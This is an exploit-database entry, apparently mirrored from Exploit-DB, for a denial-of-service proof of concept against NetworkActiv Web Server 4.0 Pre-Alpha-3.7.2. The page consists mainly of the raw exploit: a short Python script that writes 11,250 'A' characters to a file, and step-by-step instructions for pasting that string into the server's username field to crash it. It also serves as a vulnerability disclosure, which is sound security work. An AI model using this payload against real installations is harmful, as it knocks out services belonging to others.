header-logo
Suggest Exploit
vendor:
Web Server
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Web Server
Affected Version From: 4.0 Pre-Alpha-3.7.2
Affected Version To: 4.0 Pre-Alpha-3.7.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64
2018

NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 – ‘Username’ Denial of Service (PoC)

NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 is vulnerable to a denial of service attack when a maliciously crafted username is provided. This can be exploited by an attacker to crash the application.

Mitigation:

Ensure that user input is properly validated and sanitized before being used.
Source

Exploit-DB raw data:

#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-08-30
#Vendor Homepage: https://www.networkactiv.com/WebServer.html
#Software Link: https://www.networkactiv.com/Dev/
#Tested Version: 4.0 Pre-Alpha-3.7.2
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
#2.- Open Network.txt and copy content to clipboard
#2.- Open NetworkActiv Web Server 4.0 
#3.- Select Security options 
#4.- Select "Set username" and Paste ClipBoard on "New Value" 
#6.- Select "Set password" and Put "1234" on "New Value" 
#7.- Crashed

cod = "\x41" * 11250

f = open('Network.txt', 'w')
f.write(cod)
f.close()